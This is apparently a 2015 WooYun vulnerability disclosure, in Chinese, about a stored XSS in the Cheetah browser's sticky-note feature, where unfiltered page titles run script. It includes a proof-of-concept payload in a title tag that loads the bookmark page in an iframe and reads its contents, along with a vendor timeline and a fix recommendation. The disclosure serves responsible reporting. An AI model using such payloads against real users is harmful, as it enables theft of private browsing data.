漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0112810
漏洞标题:猎豹浏览器某处设计存在问题导致可以读取用户收藏夹(有条件)
相关厂商:金山软件集团
漏洞作者: wutongyu
提交时间:2015-05-08 11:11
修复时间:2015-08-06 13:20
公开时间:2015-08-06 13:20
漏洞类型:远程代码执行
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-11: 细节向第三方安全合作伙伴开放
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开
简要描述:
连5分都不给我,好坏的!
详细说明:
之前测试了2次在线收藏,如今你们2处都已经修复。
最近在反复测试你们功能,发现有一个猎豹随手贴,即:
他其实就是记录了:
常用的右击行为。
保存之后回显出来的地方,依然对title没有过滤。导致了xss的产生,因为此处涉及到浏览器用户的敏感信息,此处的xss即可以读取收藏夹,也可以读取随手贴的内容。
漏洞证明:
构造<title><script>alert(location.href)</script>
当用户保存随手贴之后:
这样我们很容易从之前的案例代码copy一份出来。但是实际测试发现会提示innerHTML未定义,反复测试之后是还未加载完执行报的错。使用setInterval()即可成功执行我们的代码。
读取用户收藏poc:
<title><script>
var s=document.createElement("iframe");s.src="http://i.liebao.cn/bookmark/";s.onload=setInterval(function(){alert(s.contentWindow.document.getElementsByTagName("ul")[2].innerHTML)},2000);document.body.appendChild(s);</script></title>
打开之后2秒执行,也可以把数值设小,设置1000都可以。
用户收藏wutongyu.info/bb.htm。下次打开随手贴:
随手贴的内容也可以获取,这里不给出poc了。厂商自己修复吧。
修复方案:
过滤此处输出在title的内容。
版权声明:转载请注明来源 wutongyu@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2015-05-08 13:18
厂商回复:
多谢反馈,感谢!
最新状态:
暂无